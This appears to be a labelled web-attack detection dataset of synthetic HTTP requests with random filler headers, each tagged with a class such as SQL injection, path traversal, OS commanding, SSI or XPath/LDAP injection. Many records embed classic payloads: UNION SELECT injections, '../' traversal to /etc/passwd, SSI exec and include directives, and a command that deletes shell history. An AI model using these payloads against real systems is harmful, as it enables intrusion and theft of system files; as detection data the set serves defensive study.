Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Digest nc=c9fbAb9B
Range: 2-1818,846125-
Referer: /4Coc/x3soAa.exe
TE: deflate
Trailer: Accept-Encoding
User-Agent: 2dznav (dV23ANK93q; znp0FaWuBW; lFVBv8fS; eEbj@n8u9o)
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3216x516
Via: o3r/9.7 148.141.3.138, nee/0.6 www.eaakn.jpeg
Transfer-Encoding: deflate
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46380
Start - Id: 40710
class: SSI
PUT /iDp090-bm/tlvr6u6/oayhmu4s/ev/i8kXdh/eJKXbhS2j/tddEfxmssler/3ores/14/zUfTGDp/Bilbheol/bttmidjhroaiOreAtg.css? HTTP/1.0
Content-Length: 44
Content-Language: uetata,ap,nlola
Content-Encoding: deflate
Content-Location: http://oy29en.ch/nnsox.php4
Content-MD5: ZWVvcmFjeHpkbGVkaHRmZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Sep 08 09:50:24 GMT
Last-Modified: Sat, 02 Apr 05 07:16:38 UTC
Host: www.aethQezoi.st
Connection: peomhesu
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: dCeniTe4-Uasp;q=0.2, ccc-mdrkm3pm;q=0.8
Cache-Control: no-store
Client-ip: 12.40.2.86
Cookie: aowNAsTtiloTdSa=$?ap;eltk=tdhstejS ;MO0lU=<!--  #include   virtual="c:\winnt\system.ini"    -->
Date: Mon, 20 Nov 06 02:47:49 UTC
ETag: "vaS9pSoNrjZV-b9"
Expect: teygiri
From: aeusaesh@srethoe.st
If-Modified-Since: Tue, 30 Jun 09 13:39:50 CET
If-Unmodified-Since: Wed, 23 Dec 09 20:01:38 GMT
If-Match: "R.XS0yAOUhj@-.YL"
If-None-Match: *
If-Range: Sat, 26 Jan 08 20:58:36 CET
Max-Forwards: 789
Pragma: Uadnn=y
Authorization: Digest response="03FFBDdDb3CbBaE48fCc1fadbE600d5b"
Range: 8582-913002,81673-
Referer: /Hno8/itHr/eneju/ruseEn/riwittf.tar
Trailer: If-Unmodified-Since
User-Agent: mgYlJNm http://www.atoce.com
UA-Disp: 608,645,16
UA-OS: Mac OS X
Via: uenUi/6.9 52.10.227.163, HTTP/0.9 129.22.242.210
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i7tg3oo=7732&epnylpiRjhe=c7xGE&eo=Tya s9a'

End - Id: 40710
Start - Id: 37533
class: LdapInjection
POST /EAkt/nIzDjUUH/eQc7gFDkcW1LTLoa3M/%u_93JwhereUV5zHM_PP.gif? HTTP/1.1
Content-Length: 220
Content-Language: evs,alq,Ecdds
Content-Encoding: compress
Content-Location: http://www.Wloscva.fr/iocyiodx/1la0ahGb/hssPt/Ftt2bp.css
Content-MD5: bWVhb2dvcmFBaHR0NnJ5bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 16:11:07 UTC
Last-Modified: Sun, 22 Jun 08 07:14:15 UTC
Host: www.jirafwneo.org:0827
Connection: ieieea
Accept: application/*;q=0.8, application/x-tar;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: vdt297-am0;q=0.9, blbht0w-ih
Cache-Control: no-transform
Client-ip: 133.128.23.213
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="02"
Date: Sun, 02 Jul 06 14:18:49 UTC
ETag: "cvwP9_XN-CuZEemWyx2y"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 23 Sep 04 03:54:05 UTC
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: "mx6513s4eb7GsNrm"
If-None-Match: "o@X5y-IYqeEBjommG"
If-Range: Tue, 06 Jan 04 11:55:55 CET
Max-Forwards: 06
MIME-Version: 9.7
Pragma: aisGoeti='h'
Proxy-Authorization: rertml hneO5=eocht
Authorization: exhnt3 5a97nph=n4fkait1
Range: 0516-7855,069180-,334-
Referer: http://www.ek4oe.gov/fnrtvh.cgi
TE: chunked
Trailer: TE
User-Agent: rsturutee
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 1.2 119.3.52.102
Transfer-Encoding: vltTj; slHnobo=ta87
Upgrade: njD/1.9
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

g9kuctst=7neO+&uSV_=63192&aNltNbewo1n=3931862&dt8m=4243138&hang=ae&lisytdsneI=4l&ekihttghb6ls=vtmigKvnr5&HzIWR8i-Gl1=e4Oo&pW=43222964&bXDVUg=E &sbpklmpp=900302340&hwodjep=917104&Mftodna=)   ( |  (ognb=aCs*)

End - Id: 37533
Start - Id: 43617
class: OsCommanding
POST /k-/EhIpRwN/e3vp17Wdb3PVTcqFwNb/xbWoE_yencIxfwinnty/9Wjjem1@VsOs/asj.exe? HTTP/1.0
Content-Length: 78
Content-Language: otl,seU,aydp
Content-Encoding: deflate
Content-Location: /Elst/Hsgl/n0eni/jef4ti.swf
Content-MD5: aXJhc1NvYXlxcHN5aW5uaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Jun 06 07:23:57 GMT
Last-Modified: Sat, 02 May 09 10:45:18 CET
Host: www.ibemtQ1.gov:6
Connection: jlbtOs
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: compress, deflate;q=0.6, deflate;q=0.1
Accept-Language: r0s9eirr-6il7ydr5
Cache-Control: no-store
Client-ip: 112.171.189.97
Cookie: lof7drrn=89656895
Cookie2: $Version="016"
Date: Tue, 31 Aug 04 24:46:27 GMT
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: sii0tlh=i1nei1yi;qiyd3=hitetaby
From: ihse@2d96a.de
If-Modified-Since: Wed, 12 Jan 05 07:06:59 CET
If-Unmodified-Since: Fri, 25 Dec 09 21:31:10 GMT
If-Match: "sGyF-_bKIPkXf1C"
If-None-Match: *
If-Range: "MgPD85cJ.77achdxumg"
Max-Forwards: 6
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM YW9pNTJZMWxvYTFhZWFpZWRtZUVzaHRob0VlOHJHbjR0ZjJNY29lZHRhYWFibA==
Authorization: NTLM bWw2aGRzY1NhbGx1cDNvaWNhbmp0b21ubnNzaXJJZW9hbQ==
Range: 559-01519,-1,07-
Referer: http://www.mtns.gov/aauen.mpg
TE: deflate;q=0.5
User-Agent: '    ;  rm   ~/.bash_history ;
UA-CPU: x86
UA-Disp: 2173,331,32
UA-Pixels: 6552x5468
Via: 2.8 www.wo8oeCds.jpeg, 2.7 www.pseigaal.jpg:8431
Transfer-Encoding: r2erw
Upgrade: ztui/9.8, e5en/4.5, osoee/7.9, inhqa/2.0, 7Mlsb/6.6
Warning: 269 172.144.95.146 "bhtiubetl5ini" 
X-Forwarded-For: 1.73.97.53
X-Serial-Number: 1018067
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

nRenceatzige=r&eeipmvgp=eN':&zcmtAhE1ocaxhs6=djOf3q7Pfiv&rotelwxiye9=uqtos

End - Id: 43617
Start - Id: 36237
class: PathTransversal
GET /vVwgetps@mJPrmocha0cn/5BX5Z@-.aspx?bolai=67&s0wU=wo40lrenprst&9me=6480&Pmr9yohbkh=h+I-++eouy&tn=e4ir&dfrdMq=pra6i HTTP/1.0
Host: 115.39.12.241
Connection: gceh
Accept: text/*, application/rtf;q=0.4, audio/*;q=0.3
Accept-Charset: iso-8859-8-i
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 238.212.43.2
Cookie: StiOnMrstWlja=dpaeXA;GVhomeg=hkmtF;oeebhroekaS=wfwhererrr21Ree;i;5Thi=trttiateits;ssnosash=07676768
Date: Fri, 26 Oct 07 21:46:18 CET
ETag: W/"MWB-h0gwAZV2Sokt_6YB"
From: m2sjud@ksr7jeno.com
If-Modified-Since: Fri, 13 Oct 06 07:22:30 UTC
If-Unmodified-Since: Wed, 20 Jun 07 12:19:05 GMT
If-Match: "-7ViJnuOfgncmQSz"
If-None-Match: *
If-Range: "q5UBGGGFJq@-6cW"
Max-Forwards: 3
Pragma: no-cache
Authorization: btBg udfn=hcmmt
Referer: /ihhyws.pl
User-Agent: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Via: 5.8 www.iErjere.png
Transfer-Encoding: emqm; SieY=agfDl
Warning: 936 www.oddai.htm "ticEeoflnmcen" 

null

End - Id: 36237
Start - Id: 43253
class: OsCommanding
GET /hotn0E/k4w@TvNYe.yg3f7-/vrierHRxueaeu/tM9KcP8/W9N.js?GSLFiframeacNIR=%7C+cat+%2Fetc%2Fpasswd+%7C&ALOmvEXSY9c=0%3A2S+tconnect+lf+dohtacces&e6teaitoceh1g=obOLgrrlB7kityoo&nph-XbTautoexecbbxp_C5D=w5qde+%29f+bese+g&iZfdtahrnO=059465548 HTTP/1.1
Host: 94.4.173.132
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: u7r-efe;q=0.9, aahhtl-uagp7au, lai4a-qnllsCtk;q=0.6, n8-tugor
Cache-Control: no-store
Client-ip: 92.41.242.45
Cookie: eWce=ataad(6emc;hessuno4sdca=iru1toeB
Cookie2: $Version="5"
Date: Tue, 27 Jul 04 10:54:28 CET
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: 100-continue
From: w5itei@2re1ofAi.st
If-Modified-Since: Fri, 23 Jan 09 07:51:43 UTC
If-Unmodified-Since: Sat, 29 Nov 08 07:59:35 CET
If-Match: "kcfwk.AaWxjtk@RI"
If-None-Match: *
If-Range: Mon, 03 Oct 05 06:30:35 UTC
Max-Forwards: 88
MIME-Version: 8.0
Pragma: efro='teo'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: NTLM dHNUZXhoQXN5YWRlZWVpaGcwZ25kYWNuYWhldWhibmRtZTBzdTRo
Range: 6235-,3-
Referer: /rd8rew/1GstAcho/07tnsa/uelbiS/neqoegro.jsp
TE: chunked
Trailer: If-Range
User-Agent: Mozilla/6.6 (X11; U; Unix 7.7; ie-ho; rv:7.3.4) Gecko/18616223
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 31z7/5.5 www.iczutte1.gif, 8.4 3.2.111.114, fdjnys/6.4 www.s8aal.jpg
Transfer-Encoding: identity
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43253
Start - Id: 41591
class: SqlInjection
GET /e.KgFros1W6q09.mspx?io1tirgotHA=%27++++%29+++UNION+ALL+SELECT+1+++++FROM+++iUO++WHERE+%28+++%27%27++++%3D%27 HTTP/1.0
Host: www.erog5n.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: e-oj2;q=0.1, s-am, DEi8h6eu-insrhes, sm-r, aard-wcg9t;q=0.4
Cache-Control: max-stale=9
Client-ip: 234.115.185.119
Cookie: cibo=jbY9;wlcopyzexecTUN62rz=euFdR76k;8dnuee=eneo;aN1Nlhi=763
Cookie2: $Version="52"
Date: Tue, 06 Jan 09 17:48:19 GMT
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: ooo5ew=tpn5a
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Wed, 12 Aug 09 24:13:39 GMT
If-Match: "ahuKAN-.KIDr2k9Abc@"
If-None-Match: "rmAQQO0d0vRMttf8So"
If-Range: Sat, 16 May 09 10:03:13 GMT
Max-Forwards: 2
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: setyft ncadaa=lsid
Authorization: Digest cnonce="Etlboss4"
Range: 7594-
Referer: http://KXnm.gov/dwTtF.jsp
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.3 (X11; U; Unix 5.1; et-3I; rv:6.6.3) Gecko/80452201
UA-CPU: StrongARM
UA-Disp: 942,115,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4149x276
Via: 1.6 103.244.78.247
Transfer-Encoding: gzip
Upgrade: nmx/9.3, ydSwut/0.9
Warning: 258 www.ai0cAey.jpg "lIihOld" "Mon, 28 Jul 08 15:46:13 CET"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41591
Start - Id: 45930
class: PathTransversal
GET /uqsZ/u2sXJ3I/ddoeramgtjtDn1sEee/hkG97250o@D3uM5SmP/fj70fDyfpW94Kw/_-mps.gEservices/EFxzWpNvIQ5location7dD.jpeg?adtodrpMdisdsc=7&Heosl=%5CWINNT%5Csystem.ini&orinOollan=118 HTTP/1.1
Host: www.nbss.net:1
Connection: close
Accept: video/*;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: e-4nsywu;q=0.6, ess-ibSrptoa;q=0.5
Cache-Control: min-fresh=25316
Cookie2: $Version="239"
Date: Wed, 10 Mar 04 06:34:45 UTC
ETag: "Ca_yu_NEHO-vKja"
If-Modified-Since: Thu, 25 Mar 10 10:19:39 CET
If-None-Match: "pCV7_RHQnEZ3Wfi"
Max-Forwards: 2
Referer: /oeOselh/iIcli0os/ihcuj/sxlrzaet/Djjacue.php4
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 7.2; 7R-ht; rv:9.6.6) Gecko/23605896
UA-OS: FreeBSD
Via: FTP/9.1 92.69.225.129
Transfer-Encoding: deflate
Warning: 212 99.170.213.133 "sltveIwilmdN" 

null

End - Id: 45930
Start - Id: 35915
class: XPathInjection
POST /mYcKybB9L-gfo/tt/astottia4uibri2sghdl/ZSOV/exYetaxbr/ecwdasl0ry/fGn5aKaEj8GI/trrd/eier4eet.nsf? HTTP/1.1
Content-Length: 70
Content-Language: P,sw63t,hthgso
Content-Encoding: identity
Content-Location: /heye/Woogueo.pl
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Aug 05 04:29:03 GMT
Host: 197.1.233.186
Connection: close
Accept: */*
Accept-Charset: utf-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=49187
Client-ip: 17.177.61.125
Cookie: tusDir=eR ;@OMdYn7Hj=ani ly0dosolu|s;uel=eNlwluc;ijewesiehovRtf=2211    or  nts9/ubn/h2n/child::node()[position()=89] or    2568=;Yuprocessing-instructionC==psroKcio
Date: Sun, 08 Nov 09 14:22:07 UTC
If-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 9.4
Referer: http://www.if0nd.it/thnhhvoU/ehgund/hhaie/tenoels.tiff
Trailer: Trailer
User-Agent: Mozilla/0.6 (Windows; U; Win98 5.0; lu-nr; rv:2.0.1) Gecko/04619482
Via: 9.0 www.zgLoss.png:631, 3.8 www.tamhr.html:20601
Transfer-Encoding: nTleoo
Warning: 020 www.caes.png:4509 "raEe6" "Thu, 13 Oct 05 01:32:31 UTC"

73aafiauo=NdGrhe|chEdsv&ielaiIjaa=wa<HelTcsee&mas=rs|TCtsozn>e

End - Id: 35915
Start - Id: 45391
class: PathTransversal
PUT /nsghteiyro.exe? HTTP/1.1
Content-Length: 206
Content-Language: meo
Content-Encoding: identity
Content-Location: http://inyiTi.gov/ytsejo/sTti9tal.jpg
Content-MD5: Y3JyMXlyZXMwVGllbnNsNw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jan 10 08:06:22 CET
Last-Modified: Tue, 21 Jun 05 21:25:17 UTC
Host: www.sfy6.be
Connection: keep-alive
Accept: text/plain, video/*
Accept-Charset: x-mac-ce, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: ituer-hIsAbd;q=0.0, 0lRt7i-mu;q=0.9, pte-arz3epcc;q=0.0, heeyt-i
Cache-Control: ploaMest='lggzt'
Client-ip: 2.231.241.65
Cookie: ielhb2smaem3re6=utJmjseNaw;idscf=aBCWybpX
Cookie2: $Version="7"
Date: Mon, 27 Apr 09 04:05:39 CET
ETag: W/"reqAMqHfAzn77w6eGvyA"
Expect: 100-continue
From: dr4hcedC@tene.com
If-Modified-Since: Sun, 19 Dec 04 08:01:02 CET
If-Unmodified-Since: Sat, 19 Apr 08 19:39:26 UTC
If-Match: "0G3hCafjr.2N4XFsY5c2"
If-None-Match: *
If-Range: *
Max-Forwards: 013
MIME-Version: 1.9
Pragma: 3ttseau='ierl'
Proxy-Authorization: gclbs enS5me=dcjupRxa
Authorization: rhxae 6oesobs=jesaj
Range: 4-825,07-,961817-416
Referer: http://www.nomms6o.it/ps2tedo/2bynTcn/r4wrhn/afwb/opmeoh8o.msf
TE: trailers,deflate;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.6 (Machintosh; U; Mac OS X 4.0; io-dg; rv:3.1.6) Gecko/29915299
UA-CPU: MIPS
UA-Disp: 088,174,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 789x027
Via: oeaunp/3.5 www.tn1tnnew.html, HTTP/9.8 98.158.191.166:8856
Transfer-Encoding: deflate
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 928 www.yictte4.js "eobt1krstsZ2erAppmt" 
X-Forwarded-For: 35.190.104.115
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dk=d2TKT&lnttiY=l&amc6ea=\tt;HhhunionUnc&Ras=3761&iesm=4&ims=../../../../../../../../../WINNT/autoexec.bat&Iez=e idevalFt+auTz&ihdmfyr=ngroup bycEns e<3elg/nsde&tolvhal3a=[ao

End - Id: 45391
Start - Id: 48713
class: XPathInjection
PUT /eSJTJ1adXaP@0374dUA/UyC1C-ayrcpmJ/gr0lremBe/TulArt/gc6enehKsiEb/ArdNteqo/lscr/9tREdh-Uc3XjJ/wF.wGzhr/eewesNn/sczwUm5LS-tk@pokK.asmx? HTTP/1.0
Content-Length: 292
Content-Language: ytszn
Content-Encoding: deflate
Content-Location: http://www.teeiz.com/f47tgnsa.aspx
Content-MD5: Y3dndGN3bTBlYnNsMDJuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Aug 05 19:13:37 CET
Last-Modified: Sat, 28 Jan 06 01:17:26 UTC
Host: www.bNoie6aiev.it
Connection: lbo4tfeS
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.9, gzip;q=0.3, identity, compress;q=0.6, deflate
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 193.98.182.250
Cookie2: $Version="63"
Date: Mon, 29 Dec 08 17:00:37 CET
ETag: "Rcq9up9t0BxEr6w1D"
Expect: dtchiks
From: 0Czsri@otpu.uk
If-Modified-Since: Sat, 09 Sep 06 24:43:34 GMT
If-Unmodified-Since: Sun, 25 Jan 09 24:06:23 GMT
If-None-Match: "-Gxu@QvhvrzGkVVflv"
If-Range: "G8RnKaGwBXBPX_hi"
Max-Forwards: 02
Pragma: no-cache
Proxy-Authorization: tymwn Rhdop=staRjt
Range: -4,59993-18,28-7301
Referer: /cejt.dll
TE: chunked,trailers
User-Agent: Mozilla/2.7 (Windows; U; WinNT 7.8; mY-au; rv:2.4.5) Gecko/41353259
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 181x2087
Via: HTTP/4.3 137.218.36.224, 6.6 www.eto3l.shtml
Transfer-Encoding: arinh; r4rSt=raiie
Upgrade: aer/1.4, ieE/6.5, hbq/3.1
Warning: 304 35.153.85.164 "bwrprqh8l3usts" 
X-Serial-Number: 586508390592927979

tmeeesl=0co&tpnpwcheut=6ueeea7idii&scroseaAantT=gb6Sctulowgl2te&ols85=boietaidRiN&XT9JqX4K6tcb=Ejug &il7tmdae=l48dYUWA&c8acbaT=3&@vbscriptQQI.2Y=286&4Rh=t@qCPLreBhBs&faoOep9=s e&php0zuOa4-=6iayned'   or  path/child::node()[position()=N]  or    '73rztna' =    '

End - Id: 48713
Start - Id: 45196
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: www.eETtSrf6a.it
Connection: close
Accept: video/*, application/x-tar;q=0.0
Accept-Charset: shift_jis, x-mac-hebrew;q=0.9
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 145.145.12.214
Cookie: fcmNRns=9;yrohs3aol=863346;eeuuettlrptdv7=ifqopnmd2haFtna
Cookie2: $Version="58"
Date: Sat, 30 Jul 05 24:45:16 CET
ETag: W/"5P7OUM98bOhr6Jn"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Tue, 21 Jun 05 09:31:28 GMT
If-Unmodified-Since: Sun, 15 Feb 09 24:23:49 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 30 Jul 05 12:00:22 CET
Max-Forwards: 8111
MIME-Version: 1.6
Pragma: lon='er6lcem'
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: Digest nc=8b2D49ef
Range: 338-,-31040,26925-
Referer: /igR3ece.swf
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: t3yEzbeVSA http://www.bl59n8.com
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: FTP/1.5 www.eeimnd.tiff, 1.5 www.acpqao.shtml
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 12.15.76.12
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45196
Start - Id: 40125
class: SSI
GET /tMXg1.uoy.GB/uJJSZOAFUQzG/nluohscn3ya.html?intlqrlce=%3C%21--%23exec+++cmd%3D%22%2Fbin%2Fls++-l++++%2Fhome%2F6coai%2FiEPd%22++--%3E HTTP/1.1
Host: 152.143.70.114
Connection: wsoia
Accept: */*;q=0.5
Accept-Charset: ks_c_5601-1987;q=0.3, cp-950
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 247.83.203.236
Cookie: eNnpNd=1524901
Cookie2: $Version="0"
Date: Tue, 06 Apr 04 12:07:27 GMT
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Tue, 11 Mar 08 14:54:46 GMT
If-Unmodified-Since: Fri, 16 May 08 24:37:33 GMT
If-Match: "i6y-8qpIzMpuDJTrZ0"
If-None-Match: "Pw-PEHSG_OvToM9V"
If-Range: *
Max-Forwards: 14
MIME-Version: 9.5
Pragma: t5the=teeo
Proxy-Authorization: NTLM aG81aXFzMGhlbndydFJuYXl3bm5hZmV4ZTBoeWlpVHNNaFNh
Authorization: Osr83 ts5n=qnhBnoo
Range: 7457-,9-
Referer: http://bwxnheH.gov/llp3Raey/Cn1snuA/os2ozr/Tdylri8.gif
TE: deflate
Trailer: Connection
User-Agent: tsehocxasl0eoi
UA-CPU: Sparc
UA-Disp: 6012,9490,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 768x931
Via: FTP/7.1 www.iaaitnwc.gif:19845, 2.6 131.29.96.60
Transfer-Encoding: mts9ws; kioho=gnahm
Upgrade: haco/6.6, xmhhhl/9.4, 0rXega/4.3, Hdshy/6.3, tnaT3i/1.8
Warning: 580 www.48eepRt.jpg "otrmnt" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 42315795
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40125
Start - Id: 48579
class: XPathInjection
POST /mddnesn0goYqu8uh/mytWX6ozVCF/5gptzsapyRtmZFBR/2sssoiqltrxhit/iQdKWUuMUuYeu@/owqisaoiiae/CLU.cgi? HTTP/1.1
Content-Length: 237
Content-Language: oneomiu,a,h
Content-Encoding: deflate
Content-Location: /man2orns.wmn
Content-MD5: ZVVwdWhyc25vbHNsYWVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 08:23:05 UTC
Last-Modified: Mon, 12 May 08 13:24:56 CET
Host: 242.192.204.102
Connection: ctauya
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity, compress, identity;q=0.0, compress
Accept-Language: yri-iewwubt;q=0.1, hrnrae6o-n;q=0.3, 9ner-tndndprs;q=0.1, is-rbchi
Cache-Control: max-stale=9
Client-ip: 166.0.104.233
Cookie: tdhsn=372;Gswp-uxI=ecopy%where;gy1UXbqDkhavingaU=4
Cookie2: $Version="380"
Date: Tue, 10 Oct 06 05:38:23 UTC
ETag: W/"wzyFfsVJbcrHNUf"
Expect: iJvsn=ronjlII
From: Wdtimv@enchEetli.fr
If-Modified-Since: Wed, 26 Jul 06 02:05:21 CET
If-Unmodified-Since: Tue, 29 Aug 06 23:27:33 GMT
If-Match: "EezgoY@xNeRCtugFgwNI"
If-None-Match: "UWxqNYqQG4PHPzk"
If-Range: Thu, 16 Oct 08 24:50:23 CET
Max-Forwards: 8566
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: betl 3bchn=Sbrodaau
Authorization: htnNnv en2g=pencllpe
Range: 89-706195
Referer: /tthoci.mp3
TE: trailers,trailers
Trailer: Date
User-Agent: tQtsbdN9Z3 http://www.aiannl4.com
UA-CPU: StrongARM
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 316x0903
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: compress
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

olphoaoi0iolrr=22547272&a09NCais7jbgeh=0305     or  count(path/child::node()[position()=((i+j+k+l+1)]    |    path/child::*()[position()=(k+1)])=1  or 37392=&sudsepe=w

End - Id: 48579
Start - Id: 41599
class: SqlInjection
GET /riSgnot9sehy/taisvaenR/-2VI/bVxElss3/UFEkHEsystemkJPV_WjX/3bdrop0@/rEJKVs/C8GatdemSu.jpg?te7aetroludetoc=2628562&h0a69nMdanes=eerni+lai7acceptnsE&ktspuway=229598&6el=u%40&d9fFseay=er+OUixwinotexec&itSn5nodati=hie&hsvmrrtah1Isd=eD_gA&Ototoa1w=9UnXxbtzo4.Y&samMD2mbor=%29&htpass902=49068&95=%27++%29+UN%2F**%2FION+++++ALL++++SEL%2F**%2FECT+++++%27tfie3o3%27%2C56%2C10193%2C%27ae%27%2C9++++FROM++ennbr+++++WHERE+++%28%27%27%3D++++%27&NimO1BW=44706 HTTP/1.0
Host: 45.205.90.199:761
Connection: iotih
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: lb1aieei='s'
Client-ip: 86.229.160.188
Cookie: oXje=oprocessing-instructiont perl6cc;risivt=xtermodm;it6mihofhm5oeo=+;sw2dxchmto0k=C3chOne;esaty=5tt+8lors
Cookie2: $Version="7"
Date: Sun, 30 Apr 06 09:58:44 UTC
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: eqidtzo
From: stji3ttj@oehtt.cz
If-Modified-Since: Thu, 27 May 04 17:37:51 CET
If-Unmodified-Since: Fri, 29 Sep 06 19:55:56 CET
If-Match: "WcnLyNvIP11Wvb170"
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: Sat, 29 Aug 09 20:15:44 GMT
Max-Forwards: 694
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM ZXR6dGN1ZW9JbThjdG9iYXNkZW5udGE1bmVpZDllb3ZvU3ZoaGVt
Authorization: Basic TkFpZWw6aWxzQnBy
Range: 7594-
Referer: http://taRal3.cz/ocniosl/tlrgegtt/ooslt8.txt
TE: deflate;q=0.2,chunked,trailers
Trailer: Referer
User-Agent: Mozilla/2.4 (Windows; U; WinNT 9.1; Ee-id; rv:9.0.5) Gecko/70904945
UA-CPU: StrongARM
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 9.6 www.veOsw.jpg:9403
Transfer-Encoding: identity
Upgrade: w6of/9.8
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41599
Start - Id: 42597
class: SqlInjection
